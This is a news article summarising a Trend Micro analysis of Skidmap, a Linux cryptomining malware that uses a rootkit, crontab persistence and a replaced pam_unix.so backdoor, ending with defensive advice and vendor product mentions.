As security experts try their level best to curb the rise in cryptojacking campaigns, on the other hand, hackers, are also devising new methods to steal from people. Per a detailed post from two threat analysts on security intelligence blog Trend Micro, there is a new Linux malware called Skidmap. According to Jakub Urbanec and Remillano II, Skidmap hides its crypto mining operations from its victim by loading its malicious kernel modules. However, that’s not it all.
Skidmap Masks its Crypto Mining Activities
After finding its target, the malware installs itself via the crontab and proceeds to download and execute the main binary. The latter is followed by configuration and disabling of SELinux policy. After all that, Skidmap malware proceeds to create a backdoor while its mask its mining activities using a rootkit. All of the above is done without the user’s consent leading to the hackers having the upper hand. By creating a backdoor in their victim’s machine, the hackers have access to any user account and can do anything they want. Analysts explained further saying;
The malware also sets up its backdoor to the victim’s machine by replacing the pam_unix.so file on the operating system with its version. Replacement of the pam_unix.so file means a specific password has been set; hence, the hackers can log in in any user account without interruption.
Apart from the above, per the analyst’s explanation, Skidmap is so advanced and comes with more than one access mode. It has different access modes which enable it to access an infected computer without detection after it has been cleaned. The latter allows the attackers to reinfect the computers again. Furthermore, it also uses other techniques to ensure its activities remain undetected in the infected machine.
The analysts finished off their post by urging system administrators always to be alert and on the lookout for any malicious files. Furthermore, they must keep their systems always update. In addition to guiding administrators, the analysts also pointed out that their ServerProtect for Linux and Trend Micro Network Defense is the best in protecting Linux systems. The latter are high-end security systems which will detect malicious URLs and files while protecting users from cryptojacking malware such as Skidmap. Besides the above, there are various other security systems from Trend Micro that can help secure systems in place.